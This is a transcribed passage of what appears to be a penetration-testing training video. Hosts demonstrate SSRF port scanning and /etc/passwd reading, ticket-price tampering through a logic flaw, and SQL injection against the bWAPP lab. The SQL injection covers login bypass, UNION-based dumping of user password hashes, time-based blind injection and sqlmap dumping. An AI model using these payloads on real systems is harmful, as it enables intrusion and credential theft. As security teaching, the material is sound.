I think we can make that happen. Let's see here. Let's jump on my computer. I've got the BWAP up, and hey, we love the BWAP, right? If you're using practice labs, that's what's inside your labs there. So it should be very similar, except for this specific example, because I created the server-side request forwarding page myself on this version of BWAP. So you won't find this in the same good. I had to create my own. Hint, it's not that difficult. I just kind of copied another one of the pages and named it SSRF there. So there you go. There's the secret sauce behind creating this, but it's just making it a little more aligned with what we're doing. All right, so I believe I'm logged in, and I'll just verify that by clicking all these things to make sure there's going to be a login portal. Yeah. No, it's good. Okay. So I'm going to go to my custom page, which you don't have, but don't worry. It's all about the demonstration, right? And it is ssrf2.php. There is an SSRF page, but it wasn't as good as I wanted it to be, so I kind of did my own thing. So here we go, and if you've seen this before, inside the BWAP, you kind of go, oh, I know that page. But it says select a language. We've got this one, kind of bump these things up a little bit. And I can do a drop down, gives me the change, just choose English and click go, and I can see that. Thank you for your interest in the BWAP. Everything's great. Now, what am I looking for here? What is going on? What's the interesting bits that's happening? Well, always want to take a look in the URL up here in the top, right? So let's kind of zoom in there a little bit. And kind of see what's going on there. We can see this ssrf2.php, and we have this language equals lang_n.php right there. Well, it's calling another page. It's referencing something else. Now, obviously, this is kind of a self-contained thing, but this could have easily been another web page on a different server that's out on the internet, maybe a cloud storage, something like that. But even if it was local, that's still fine. We can still do SSRF. It doesn't have to be attacking other things. It can be attacking itself, try to help you gain more information, right? So let's start off with the let's do some port scanning. Right? We'll use the SSRF capabilities of this to do port scanning. I can test for that. I'm just going to take this language equals lang.php. I'm going to change what page it's looking for. Well, what page it's looking for? I'm going to do http://127.0.1, and then colon whatever port I want to check to see if it's open. All right. So let's check for port 22, which is right.
Time that no, it's going to be
there you go. SSH. I keep it secure around here. Come on, son. Right. There we go. We're going to check and see the SSH port is open and accepting connections. I hit enter. Looks like we got some response down here. Let me see. We sure did. We can see I was getting kind of an error here. HTTP, oh, what's that? SSH 2.0, and kind of wraps around. Open SSH 47P1. So guess what? I can't actually click that. There it is. Guess what that is? That is the banner for the SSH clients on our server. Like, so when you try to connect an SSH client, that's the banner you get when you try to make that connection. Okay? It's giving me that it's running OpenSSH version 4.7P1. I have successfully port scanned port 22. Now, okay, I can manually go through port lists if I like, right? That would be daunting and slow. But
that itself, right, actually proves that you're able to do that.
Absolutely. Okay. Right. Now let's juxtapose that. Let's check a port that was probably not. Okay, and see what happens. So we can see that. I'm gonna go back up here. I'm just gonna change the port number on the end of that there from 22 to running give me a port. I know it's fun. You got 3,000. Port 3,000. See what it does. Here you go. And I can see that I got a connection refused. Oh, okay. All right. So there's a bit of difference going on there between an open port versus a closed port. We might also see some differences as well. It just depends. Some services are good at kind of responding about what they are and who they are, giving you a banner. Some of them are more like, this isn't the traffic I'm expecting. I mean, I'm open, but it's weird. So it might respond oddly or not respond correctly. So we might need to see something else different. So you got to start. You have to be familiar with how applications work and some of the functionality that goes on there, so you can kind of discern whether or not the port is open or closed or what have you. Right. So with this in mind, I have been running Burp Suite in the background. Let's go back to Burp. You get that HTTP history tab and the proxy tab. You can see all these have been gathered. Right, like that. It's been gathered. Here are the requests. So I can see my port 3001, and then I can also see the response, and it's just the underlying HTML code of the page. But if I kind of scroll down, I think it's under it should be right here. There we go. You can see there's that connection refused right there. Right? Okay. But I want to do this programmatically because that takes less time, and I can take my hands off the wheel. Right. So I'm gonna grab this. I'm just gonna right click and send this to the intruder. In the intruder tab, we have this positions tab. I want to go here. I want to clear these out because these aren't positions I want to test against. So the clear button. What I will do, let's see when I swing at this, is I got this. There's my URL right there. What I want to do is I just want to kind of like fuzz my way through the ports that I wish to check for. Okay. So I'm gonna highlight that action and hit add. And you'll notice now this has this little funny. There's a specific symbol. I can't remember what it is. It's two weird little symbols entirely green. It's very pretty. Okay. Now let's also go to payloads. Now I'm gonna keep it on the attack type of sniper because we only have one specific thing we're going after. On my payloads. And here in payload options, I'm just gonna do a simple list. Now I can create a list and load it from a file. If I want to keep that file around some common ports or things like that for use for things like this, I could, or I could just add them one at a time right here and load it that way. So let's do some common ports. Let's do 21. Add that. We know 22 is open. We'll check 23, right? Because telnet is a possibility. Let's do 25. There's some SMTP. Right? Give me some more. What do you think?
67.
67. All right.
Yeah, and 49.
49. All right. I'm gonna go with those are some odd ports, but okay. I'm gonna pick some other ports other than that. How about like 139? Yep. Those are some actual ports you might find, right? That's a good port. 445. Another good port. Let's see here. Let's do 631. That's always a fun one. You know what happens in that. Hello. And let's see here. Anything else? I think that's a good list. We got a few things here. So now it's gonna basically go through those numbers and add that to where we highlighted and change that out for each number. Basically a loop through these different things. All right. I've got enough done here. We're gonna hit the where's the attack? Am I zoomed in? Yep. No, not zoomed in. I just don't see the. There it is. Sorry, I just wasn't scrolling up. All right, so Burp Suite telling me that because you're using the community edition, things are a little bit throttled. Yes, I know. It was firing off. I know something I was preparing for this demonstration. This first request, which is the original request, always does that again. It took a minute. I don't know why I did that, but it took a hot second. We'll wait for that to finish. But ultimately, what should end up happening is once that is done, it'll start cycling through those port numbers that we did, and we can see those responses. Now we can look at this response and to make sure we have a good baseline in which to check the others. Because we can see if we check the status here that it did give me a status of 200, so it did return something from the web application. Gives me the link that might be helpful for us. But we can also just kind of come down and look at the response, which is extremely important for us and what we're doing today. And we can see that. Let me check that request again. Yeah, I can see it's port 3000 is what we went after, which is the first one. Now we see the other ports actually starting to go for it. And if we see the response, we should see something like I can search for connection, and then just do next. There you go. It does a connection refused. Well, let's check 21. Does that have connection refused? It does not. So I'm clicking through the only connection word in there is this one, which is connection closed. So this one actually must mean that something different happened. So we'll scroll down a little bit, look through here, wait for it. There it is. So, oh look, HTTP request failed. 220 pro FTPD 131 server. Hey, look at that. So we're scanning the local box. That's why I use 127.0.1. I could scan another box. If I knew the IP, internal IPs that are going on there, I can start scanning internally for that information, right? So really cool stuff there. Let's check 23. I don't think that's open. Yeah, see connection refused. So we know that port is closed. 49. Let's see here. Yep, connection's refused. So I'm seeing that port is closed. Again, you throw a laundry list of these things and see what happens. Doing it programmatically is a whole lot faster, obviously, and a whole lot more efficient and effective when you're trying to do it manually. Once you get it down, you know you can do an SSRF. That's where you want to go.
So even if the connection's closed, we're at least proving the fact that we are able to carry the attack out.
Absolutely. Okay. Yeah, so we're doing that. The other way we can check this, we can do like we can read files, local files. So that's always a fun one. Let's go back to the VWAP. I'll show you what I mean. So instead of saying HTTP, let me get zoomed in just a bit. Instead of saying HTTP blankety blank blank blank, right? I don't want ports and stuff. I want files. We'll do like we saw the attack in the OS file // and then whatever file I want to do. So I'm going to do /etc/password. Hit enter. Scroll out so you guys can actually see this. Oh look, there's the etc password file. So I'm reading the etc password file. Fun is happening for everybody at this point in time. I can start looking for sensitive information and gleaning any of that good stuff there. Maybe using password config files. Also the wonderfulness that is happening here using SSRF.
All right, Daniel, thank you again for actually helping us and showing us this idea of the SSRF attack. Remember that what we're trying to do here is get the server to really do the request for us and to do everything that it actually needs to do. Well, that is simply sending a kind of a request forgery of all things when it comes down to it. So that means that there are plenty of more attacks to come when it comes to PenTest Plus. Just wait for another episode to make sure you join. As many technical attacks as That's right, you have come back to join, well, Mr. Daniel, Larry, and myself as we continue on with PenTest Plus. And today, we're diving into a little bit, I'm going to say less technical of a particular type of attack, but something we actually have to think about, which is business logic flaws. And here, of course, it's going to be Daniel, Larry to actually talk about this a little bit more. Now, Daniel, more than likely, just like me, I got business logic flaws in the realm of a PenTester, is it?
So you would think that it would be, and I love that. So Ronnie has fallen for the trap of the naming convention of this, which is why I hate that it's referred to as business logic flaws. It's more like application logic flaws. Yeah, I know, right? Because that's a little confusing.
Yeah,
just a little bit, just a hair. But it does illustrate the fact that if you were unfamiliar with this and some started asking about business logic flaws, you might be like, I mean, I don't know how actuarial comes into this, or things of that nature. It's like, well, that's not what this is about. So,
like business application flaws.
Correct. Something within their web application.
Okay, yeah,
and what we'll get into what that means. But ultimately, what and a business logic flaw or application logic flaw, or just a logic flaw maybe more generally, is what it allows us to do is to bypass steps. They'll go around. Do I require a password? Yes, you do. Well, what happens if I don't fill the password out and I just go to the next page? Hey, you're still in. Well, that's a problem, right? The logic was not really sussed out well when it came to how that application should flow. And every now and then you go, I wonder if I can yep, I sure can. And it allows you to just go do the thing that you think you should do. That's what we mean by a logic flaw. Someone didn't think their way logically through from point A to point Z, and the areas in between get a little muddy and allow you to kind of just walk around and do things and click buttons that you might not, or you should not have access to, or capabilities therein. So that's what we mean by a business logic flaw or an application logic flaw.
All right, so when we start talking about how does this actually end up happening, where does this process begin, and where do we find the root causes of this?
All right, so the root cause behind all this action, or why this occurs, is due to the fact that, well, when people create applications or set up a system in place, sometimes, kind of like what I referred to just a moment ago, was they didn't see the forest for the trees, right? They did not think their way through this. They made some bad assumptions. And typically that's what I mean by that, is that they're making bad assumptions. So we got you out there in TV land, we got Ronnie sitting right here, and you guys are using an application. It's a lot of fun. It's right here for us. Why wouldn't I use this, right? But the programmer that created all those bells and whistles for you to be able to use and enjoy didn't think that you might get a little curious. You might start poking around in places that aren't normally poked around in. And that's the problem, right? So from those bad assumptions comes issues, right? Trusting the user. I don't know how many times I've said it. Do not trust user input. If you didn't hear me say it before, I'll say it again. Don't trust user input. Trusting users and where they can give you information and trusting that that information is what you expect it to be, making a bad assumption, right, is going to lead you down the road of some sort of logic flaw or other types of attacks as well. So I've noticed that trusting user input tends to be one of the major root causes of just a lot of attacks.
All right, so in this case then, because it's still not super clear to me, can you show me an example of what we're really talking about?
Yes, let's do that. I like doing examples. I'm with you, Ronnie. I'm a show me kind of person. All that highfalutin talk you got going on there is real nice, but we're going to use a web application called BWAP here to show you what I mean. Now, this could show itself in many different ways, but BWAP has one of my favorites, which is called, let me see if I can find it here. There we go, Insecure Door, or IDOR, which is commonly referred to as the Insecure Direct Object Reference. And we have a couple of IDORs here that we have capable of running squinting that lets me know it's a little small.
Or my eyesight is really bad.
Well, a little bit of both. We like to make sure everybody can see and have partake in the class, right? Here we go. So we've got this Insecure Door secret, change secret, we've got reset secret, we also have this order tickets one. And I feel for my money that the chain or the order tickets one really has the most bang for your buck, because if this were to happen in real life, you'd be like, oh no, man, I have to really stop myself from doing this if I found this out in the wild, because the benefit to me would be great, right? So let's see this order tickets. I'm gonna click on that. That's gonna give us this hack button. And now let me get to scroll back down. We have this web application for ordering tickets. Pretty straightforward, right? Let's see what we got here, Ronnie. Let me get to scroll back in a little bit here. And it says, how many movie tickets would you like to order? They are 15 euros per ticket. That's kind of pricey. That's heavy. That's like $25, yeah. That's a lot of money. I don't know what you're going to see, but it must be good. And it does say movie tickets. It's gotta be phenomenal at this point. $25 a ticket. But here we go. It says, I would like to order blank amount of tickets. So the logic here is, right, I order one ticket, I spent 15 euros. Okay. Pretty straightforward, right? I tell the app how many tickets I would like. It multiplies that by whatever this number is, which is 15, and then it deducts that from my bank account. So let's order, me and Ronnie are going to the movies. We're going to get 2 tickets. Oh, heck, we'll add our viewer, you out there in TV land. We'll confirm. So this should be 45 euros. Right, 45. Hit confirm. Scroll down. It says you ordered 3 movie tickets. Total amount charged from your account automatically was 45 euros, and thanks for your order. Hey, that was fun. What a great game. But we haven't actually done anything yet. This is always the first part of any kind of hacking. You have to test the thing, see how it works, so you can find the issues. Now, what you might not know is I've been running the lovely Burp Suite software in the background, and I've been gathering all the information of the get and post requests that we just went through. Let's take a look at that information and see if anything strikes our fancy as interesting. Come here, Burp Suite community. I've lied to you horribly. What is it? Because I have the Burp Suite turned off. That's when you search Burp Suite. I like lying to you. It's fun, right? Let's turn it back on. Let's do it again. All right, order 3 tickets. And confirm. All right, 45 euros. I'm going to be broke at the end of this. All my money will be gone. There's the post request right there, and I can see that information as I pull it up. And in the request to the application, I'll get us a little bit more intimate here. I can start to see. There's the post, right? So there's HTTP verb, and this is the web page that we use, and everything's looking great. We got a host, we got a user agent, we got what type of information it'll accept, HTML, XML, text, so on and so forth, what language it's using, the encoding that's occurring, the content type. We got this form URL encoded, letting us know that the stuff's probably going to be URL encoded. We see any data, the content length, the origin. So far, so good. There's a cookie in there. We got something we might be able to fill within that, and then upgrade. And then down here is the actual request that we made. Ticket quantity, you can see. It says 3, right? And then, ticket price equals 15. And then the action equals order. Interesting. So this makes up the body of the request that we sent. And I've noticed something, Ronnie. It tells us the ticket price right here. Now, Ronnie, should we have access to the price of the ticket? Or should that be something hard-coded that no one ever sees or touches?
That should be hard-coded, no one ever sees or touches.
But guess what?
We see it.
We can see it. And therefore, and it's being pushed along as a post request,
right?
We are giving data to this application. You don't suppose, do you, that we can modify that? What do you think?
I would think not, but I'm pretty sure I'm correct on that.
Well, let's just see what happens. I'm going to right-click, and I am going to send it to the repeater, like so. So the repeater is a fun little thing we haven't talked about before, just make sure we reiterate it. It basically allows me to take requests from my history and repeat them after modifications that I made. Because once I've made a request, I can't modify the request I've already made. I've got to make a new request. But this is kind of cool is I can just kind of ingest that, make my modifications here. I can come here and type this, I can change my user agent. I can say, my user agent is like Ronnie. Right? It allows me to make those changes I can pass along. Hit send. You'll notice I get a 200 response. It's fine with that. That's okay. Right? Pretty cool. But I don't care about user agent, at least not at this point. I'm more interested in this down here, that ticket price. So let's order 10 tickets. Let's go. Let's have a party. Let's order 10 tickets at €1 each. How's that sound? Sounds pretty good to us? I like it. I'll hit send. I'll come over to the response. Hey, look, I got a 200. Let's kind of just scroll down here and see what we see. Kind of get past some of the code for the page. And there's the how many movie tickets would you like to order? I would like to order blank, blank, blank. It says you ordered 10 movie tickets. Total amount charged was €10. So you can see this is an application flaw. Like we should not be able to do this. They trusted us. They made a bad assumption that we would never see that ticket price being pushed through the web application. Someone just didn't think the logic through. And that's what we mean by logic flaws. And this is a prime example of how that might work out. You'll notice the other ones were changing secrets, right? That could be passwords. So if I have the ability to change a user's password, well, that could be an issue, right? And I could log in as them and just buy tickets from their bank account. And that would be a whole lot easier for me. So you start to see how this could affect us and why we need to be able to test and look for it so we can report that in our findings if we do find them to our customers.
All right, well, there it is. You just saw an example of a business logic flaw. And what we really mean by that, of course, is the application logic flaw. That what somebody's actually doing this hopes that we don't discover. But if you do have some pen test skills, you might discover it and you might be able to do some of the things that Daniel has showed you as well. So make sure you take the time to watch this again if it's still a little bit fuzzy to you. And this example should help make it clear. Well, that will wrap it up for us in this episode, but there's more to come. Make sure you stay tuned for that, and we'll see you in the very That's right, just these two guys again. You're going to be with Daniel Lowry as we get started. We are now going to dive into the realm of, well, SQL injection. It's kind of funny because everybody calls it something differently, but I kind of settled in on SQL injection. Everybody says SQL injection.
Yeah, I can't say I've ever heard
but I'm sure now that we've done that, somebody will
yes, well, actually, Daniel, I say SQL. Yes, I get it. It's fine.
All right, so Daniel, help us out here. We're not real familiar with it. What is it actually, and then how are we going to get started?
All right, so a SQL injection is basically when you have an application that uses a structured query language database in the back end to hold information, right? And you want to reach out and grab that. You'll typically have some sort of front end where everybody can put things in and say, I would like this information, please return to me. Then that front end passes that to the back end grabs from the database, back, and then presents it to the front end, and the front end presents it to you. This is the normal operation, right? We like this. This is good. It's made our lives very, very nice to have all this arranged data that's so easily referenced and usable, right? Especially when it comes to web apps. The problem is that if you improperly code these things, you can run into a problem, and it will allow me to actually go, I think that this is a SQL injection. Seems like it's pulling a record, and guess what, Ronnie? This is all coming from user input. Right? We love user input, right? So don't trust it. Don't trust it. And because that user input gets trusted, well, and from some coding errors, it can allow for you to inject into your user input SQL statements. And of course, because of the flaw in the application itself, it says, hey, I've got some SQL in my SQL statement. I should probably execute that, and I will. And it does. And then of course it uses the web browser and application to return that information to you, and it shows right there in your web browser. It's really kind of crazy if you've never seen it before, but it can be obviously very devastating to anybody that has that sensitive information in their database that they're not presenting to an end user that they shouldn't be.
So if I go to a site and has a form that I'm filling out and I put something in there, and it only gets returned, looks like I pulled it from different places, that's possibly a SQL database in the background.
Absolutely.
What you're saying is we can actually take advantage of that if it hasn't been coded carefully.
Ding, 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 ding. What do we have for him, Johnny? We've got a lovely SQL injection. He is now the owner of sensitive information from the company that's web app he just hacked. So yes, that is nailed it spot on.
All right, so how do we begin to test for something like SQL injection then?
All right, how do we test for this? Well, it's actually not too difficult, honestly. Part of it, so let me back that up for a second here. It's difficult in the sense that you got to kind of know, like what Ryan was just talking about. I got to be able to look at an application and think, this might be a good spot for SQL injection, right? So maybe I'll use that, right? So let's jump into this thing really quickly here. I got this VWeb up. They have quite a few injection attacks here. They're not the only game in town. Websploit has a few, like if you want to use Holiday, which I really like. Especially, they also have some SQL injection. Notice A1 injection back in 2017, OS top 10. SQL injection was a big one. You can see these with these bypass authentication. You got like a login form. So here's the login for this system. Makes it a little easier to see. And here we can test for SQL injection by using like Boolean statements and or things of that nature. So I can also, you need an injector, something that would be treated by the web application as a special character to make what you're getting ready to say a part of that statement. That's going to be the big help. And typically that's done with a single quote. I've seen some double quote stuff, so you see that in the notes, but typically, by and large, if not 100%, I just want to make sure that caveat of the double quotes. I've seen that a little bit, but typically it's going to be a single quote. So I just throw a single quote in there, right? And I'm just leaning on the keyboard for password here, and I hit login. Whoa, right? Saw some weird stuff. And I do also see an exception has occurred. Something might be telling me that something's going awry, right? Not all the time, but if I see something weird like that, that might let me know that I've had a problem and that I might be injecting SQL because of that little single quote. But if you don't know that that single quote is what does that, then you're not going to get very far with this. So you and the single quote should become one over SQL, right? Put that in your mind when you start thinking of SQL injection. Is me and that single quote are going to get real friendly real fast. Let's see here. All right, so yeah, single quotes. Every now and then I might see a double quote. It just depends on the type of language and things that can occur. And then those Boolean statements start coming into play. Let's actually bypass this really quickly and I'll show you the de facto SQL injection. So I'll put my single quote in there, and then I'm going to say, or, right, there's your Boolean, 1 equals 1. Ronnie, help me out. 1. Does it equal 1?
It normally equals 1.
So that is a true statement.
It is a true statement.
All right, so I've got two sides of an or. It's this or that, correct? That's what we're doing with an or.
All right.
So either my username is nothing or 1 equals 1, right?
Yep.
If that is true, then the logic says give you what you're asking for. Right. So I also have one more thing. We have a couple of inline comments characters. What that does is say anything after this is just a comment. Ignore it. It's not for the system. It's for humans that read the code. Right. Now that can show itself as a hashtag, an octothorpe if you're pushing your glasses over your nose, right? Some people refer to it as a pound sign from old touch-tone phones. That can be an inline comment. So what I want to do is say anything after this in your SQL statement on the back end, just ignore that. I want you to stop here. Right. So that might work. You might also see dash dash like so. Right. That could be one. So there could be some testing that you have to do. There's also dash dash space dash. That is also an inline comment. Depends on the SQL database that you are using, right, and how it reads those things. So just you might have to do some testing. It might not work the first time. Don't give up though. I'll try another thing. All right, but here I'm gonna go with this because this is the most typical. And for the password, I'll take the old elbow. I'm gonna lean. I got my password. All right, good stuff. I'm gonna hit login, and oh look, status updated, user authenticated. So using SQL injection for bypassing authentication does seem to work from time to time, doesn't it? Yes, we do love it when it does occur. And let's see here, I'm logged in as I go away little thing. I guess I can't two-finger scroll over here. Looks like I got logged in as admin.
Oh, nice.
So that could be really bad for whoever's running this application. That's a very simplistic SQL injection, not that it's not effective, and there are other variations on that theme which could allow you that. That one probably be less likely to work than most. But ultimately, at the end of the day, that's what we're doing. We're trying to get some sort of true statement so that people evaluate that as true and give you what you're looking for.
All right, now are there any other types of SQL injection that we can talk about?
Absolutely. We do love SQL injection types, and one of them is going to be error-based. This is my favorite one because it's very simple. Let's jump back into the web app here, the VWeb, and let's go for the first SQL injection that they have, which we have right here, which is a search and hit hack. And here we have a movie search thing. Let me do this here. Let me get to where we can see it. Right? Maybe a little too much. There we go. Search for a movie. You put the title of the movie. So if I'm Iron Man, I hit search. And it's going to show me the title, the release, the genre, and so on and so forth. This goes back to our idea of testing, right? Okay, let's probably pulling that information from a database. So let's test with that. So I'll say Iron Man, single quote. You don't have to put the Iron Man stuff. You just put single quote. And then I'll hit search. You'll notice I get an error. You have an error in your SQL syntax. Oh, yay. Right? This is why I like error-based SQL, right? Inject. Because it tells me you've injected and there's an error. Oh, okay, don't worry, I'll fix that. Right? And now that's all we really have to do is start to, well, now that I know I can give you SQL, let me start giving you SQL and see what you can respond. So let's see if we can enumerate this database a little bit using just this web application. So I'm going to get the single quote, and I'm going to do an order by, I'm going to say 1. Now, to speed up, because time purposes, I know what's inline comment is for this one, so dash dash space dash for me. I hit search. You'll notice I don't get an error. That's because my SQL statement was good. It liked it. Only when I do something wrong is it going to complain. I will continue with the single quote order by until I hit an error. Right? So if I hit order by 8, dash dash space dash, hit search, you'll notice I now get an unknown column 8 in their order clause. So what I was doing is looking for how many columns are in this database. Order by 1. Well, 1 is fine. We do have 1. Order by 2. Right? Once I got outside that realm, it was like, no, that's a problem. There's no 8 column. And it let me know. That's why I really like it. Again, it's very informative. All right, now that we know that, we can label those columns so I know where they fall inside the web application so I can use that. So I will do order by, I'm sorry, I'm going to do a union select. So let me get that away. Union, select. I'm going to do 1, 2, 3, 4, 5, 6, and 7. And they're just separated by commas, no spaces. And of course, dash, dash, dash. And that should give us actually show the number in the column where they land on the web page. So let's go search. We see the movies that are in the database. And then look at that. There's 2, there's 3, there's number 5, and there's number 4. Excellent. I've got some good spots to actually output information that I'm going to pull from this database. So let's go back and continue to use our union statements. So I'll use union, select, if I can spell it, but I can't. My finger just keeps missing the button. That's fun. All right, so union select. And now what I'm going to do is basically say, I'm going to run some code and then return that value, the answer back from that code in those columns, in that space. So here I can do things like, what's the user, right? That's T-SQL statement right there. Then I'll do 3, 4, I think 5 is a nice long one. I'll do at version. That'll give me the version. And then 6, 7. You always have to complete those columns really clean. And then of course, in my comment, hit search. And we come down, we can see there's the user that's running. There's the version of the SQL. That's what's going on. So it's version 5.0.96-0, whatever that is. Right, so fun. Cool. Well, okay, now let's really start digging into this database here, right? So I'm going to union, select. There I go. Thank you, finger. Work with me today. And now I'm going to say, well, let's get the table name, right? So table underscore name, and then, what was that, 3, 4, 5, 6, and 7. And it's going to come from information underscore schema, there we go, dot tables. Yes. And then big bang smash. Always give that in my comment. Hit search. We go down to the bottom. Ooh, that's interesting. So now I can start to see table names like blog and heroes and movies and users. I like users, right? You like users? Sure. I like users. You always say we see what kind of information is in that user table. Right? I like it. Let's do it. So from here we will do union, so oh my goodness, I'm selection, not selection. Union select, and we will go with column underscore name, just 3, 4, 5, 6, 7, from information underscore schema dot columns from table equals like this, users, because that was the table name. Oop, almost forgot. Don't forget that. Hit search. Oh, got error, syntax. Oh man, I typed it wrong. Ronnie, help me. This is the fun part of doing it manually. Is typos. Yeah, we'll slow you down. Union select, and it was one. It was column name. Let's see here. And it was 3, 4, 5, 6, 7, and that's from information underscore schema dot columns, and where I think that's what I did wrong. Table equals users. Let's see if that works better. Search. I have an error. What am I doing wrong? Table. It's not table. It's table name equals users. Yeah, gets you every time. Gets you every time. A lot of remember when it comes to SQL injections. Not gonna lie. But time's a charm, right? But the practice is good for us. Union select. I'm getting better. Union select one column underscore name and 3, 4, 5, 6, 7. Bam. From information underscore schema dot columns where it's table underscore name equals users. Bam. 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 Let's see if that works. Yes, there we go. That was my problem. Okay, now we're getting somewhere, right? Because I'm seeing good stuff. ID, login, password, email, secret. Oh, it's a good day at the beach now. Ronnie, which one's? Give me two, Utah.
I'm gonna say secret and login, right?
Login. Secret does sound good. I like password. Password. That's what it's doing for me. I don't even know password. Let's go password. Secret could be great, but I think password. So login, password. Let's see here. Can I type it? Oh God, help us. Union select. So select one, and I'm just gonna say, was it login? And 2, 3. I think 5 was a good one. Oh, 4, and then 5 up the password, and then 6 and 7. You always have to make sure they're labeled in some way. It's gonna complain at you. And then from users like that, and hit search. Yeah. Such thing has no columns. I love it. That's why I would say you have to have the same number of columns. Oh, it's going to get angry. I must have made some mistake there. Let's fix it. Union select 1, 2 was good, right? 2, yeah, that was the first one. We'll go to login, and then 3, 4, 5, 1, 5, which is going to be our password, and then 6 and 7 from users. I like it. Makes me feel good. Let's hit it. Yep. Things have happened. Oh yeah. Right? So this is fun. This is a good time, right? Because we've got usernames, name, and we've got what looks to be like an MD5 hash password, maybe SHA, but that looks like MD5. And then I just got to run that through my favorite MD5 cracker, and I'm off to the races with usernames and passwords for the system. Error-based SQL is kind of daunting because all the type details and that stuff, but there you go.
What about something like a blind-based SQL injection? What does that mean?
Oh yeah, blind-based is a real fun one because what it does is basically take everything we just learned in error-based, apply that, except when we're testing, we might not be able to see results very easily. That's the idea of blind-based, right? Let's jump back in here, and I'll show you what I mean here. So let's grab, I think VWeb has a couple of blind-based. There's a time I like those. And hit hack. Hack, there you go. And we got search for a movie, right? We've seen this before. Lather repeats. Put in a movie, Iron, and then of course we add our little single quote character and hit search. Cool. So notice nothing really happened, right? So it's not an error. I'm not getting errors. So we're going to try a time-based module to see if what we're doing is actually working. If it does work, it should wait X amount of time and then return the results. And then we know if it did wait the time, that means it followed the command, which is SQL, and I've injected SQL successfully. So time-based can be really helpful on this. All right, so let's see here. I'm going to search for a movie. I'm going to put my single quote. And this time I'm going to do dash sleep. I'm just going to run the sleep function. And this one, it runs a little weird. So I'm going to do 0.5, and that should give it 5 seconds. I don't know if I do 0.5 or what. If I do like a 2, it's like 20 seconds. So we'll hit search, and we'll go up here, and where's my tab? There it is. It's not. Oh, I'm running through it. We didn't see it. I thought it was over there. It's over here. I'm a crazy man. Let's try again. We'll do injecting dash sleep, and we'll do. I'll just do one. It's going to be 10 seconds. And we'll hit search. This time, we see the app. Come on, it's waiting. It's got that little bouncy ball. Going back and forth, playing table tennis. And after around 10 seconds or so, we see that it did eventually finish the job. And we're back at the app. So it is taking my SQL injection. From there, now I start my order by, my union statements, and I can add sleep to make sure that what I'm doing is effective. Of course, if I'm not seeing account output, that's also letting me know that that's not effective. But we don't have that same visibility into, or that verbosity that the app was giving us before, and letting us know what's going on. We have to do something to verify that things are happening. If nothing comes out visually, then we have to rely on something like time to make sure that it is occurring.
All right, so help us out with the concept of stack queries in this type of attack.
Yeah, stack queries are really cool because basically it's kind of like doing a one-liner where I've got one SQL query and I've got another SQL query. Well, I just want to make them run at the same time, like right after each other, in succession, like a string of stuff to do. And just like in a one-liner in Bash or other languages like that, I can use a semicolon to string things together. Now, this is not susceptible to stack queries, at least as far as I've tested it. Sometimes with PHP and MySQL, there's other versions that don't run stack queries very well. But all you would do is say, I'm searching for a movie, right? You throw a semicolon in there and say, like drop tables or whatever. You start giving it a running side. This would be bad for that action. Because if I finish that else, and do all the things you're supposed to do, it will run the first command, which is find that movie, and then we'll drop all the tables and erasing them from the database, which is no bueno. Right. But you're just stacking together. That's the idea of stacked queries. Is using that semicolon to bring multiple SQL queries together and run at one time.
All right. Now that brings us to our last little topic here. I'm not sure if I've heard of this one. SQL map.
Oh yeah, right. SQL map is a wonderful thing. I'm bored that you have never heard of this because all that wonderful type stuff that we've been doing and watching me struggle with, that manual injection techniques, it's good to know how to do. Don't get me wrong. You need to understand those things. But automation is kind of where it's at when time is of the essence. SQL map is an automated tool that allows us to do SQL injection testing and subsequent dumping of database data from the ease of running a tool instead of trying to work through an application. You just find where you think an injection point is, slap in the tool, get any other information that you might need, and then fire the tool away and see if its list of different types of injections are usable against that area. Seems like a whole lot easier and more fun, and can be more effective by using this tool because it can be hard for us to go through a laundry list of different SQL injections to see if they work. So let me show you what I'm talking about. Let's get back in my machine here. I got my terminal up. I've already kind of pre-gamed this a little bit here, but I'll kind of walk us through what we're looking at so we can understand it and then see what the output looks like. So I've got the SQL map -u, which means what URL are you feeding me to attack after? Now, I have the BWAP here, that's the URL for it, which is the IP address plus the BWAP directory that it lies in. And I just grabbed that first SQL injection attack that we looked at before. It's SQLi_1.php. And then I did do some searching, and this does show up in that URL, which is the title, which was Iron Man, and so on and so forth. And the action equals search. I also added my cookie, right? Dash cookie equals word of advice, use single quotes to encase all of these things. Otherwise, you're going to go, this does not work. It's a liar. It's weird, and it does weird stuff. Single quotes are where it's at, encase everything with single quotes. So -u, single quote around HTTP, so on and so forth, right? Dash cookie, single quote, in the middle, that's going to be whatever your cookie information is. If you have dash data, so if that data was not showing up in the URL in the body of the request, dash data equals single quote, and whatever that information is. That will help you get a whole lot farther. Okay, all right.
All right, what is that DDS at the end?
The DDS is basically saying, hey, if you are successful and you find a database, tell me the names of the database. That would be great. I would enjoy that. So let's fire this thing off and see what happens. There we go. It looks like the backend of DBMS is MySQL. Do you wish to skip the test fails for other DBMSs? Well, sure. And default is yes. It also says the remaining tests. Do you want to include all tests for MySQL extended, provided level 1 and risk level 1 values? I'm going to go default here. I'm firing it off. It's rocking. It's rolling. It's doing things. You see, it's running like time-based line. Yeah, stack queries. All those lovely things we've been talking about. It's doing it by itself. Ooh, what's this? Get parameter title is vulnerable. Do you want to keep testing others? Heck no. You notice we've already found an injection point, so we got the end by default. Go for it. Hey, look at that. 4 available databases. There's the BWAP right there. And then I can throw in table information with dash tables. And once I name the database, I can start to dump that. There's a dash dump option or dash dump option. You can say start dumping all that information out to the screen. I can enumerate the column names with dash columns. Right? It just makes life so much easier. We'll do tables really quickly. I don't need the DBS anymore, so I can do dash. Let's see here. It will be. Let's look at the help file real quick here. SQL map, so you can see this help. And here's where all that stuff is. So if you forget anything, like there's dash tables. you can do -D for the database to enumerate. So if we know the name, we can do a -D for that name, which we do. It's called BWAP, right? We saw that, which was right there, right? Capitalization doesn't matter. So let's try that out here. We'll bring that back up. -D for the database name, which would be WAP, like so. And we'll do -tables, right? That's what it was? Tables. Yes, tables. From that, fire off, it's running through. There are the tables. We do the same thing for columns. Once we see that ID or login and password, we grab all the information nicely formatted. Very easy to work with. Run through that, just want to dump the whole thing down, hit that dump file, bam. You can even get shell operating system using this if it's possible. This can attempt to work with that and be very effective in your SQL testing.
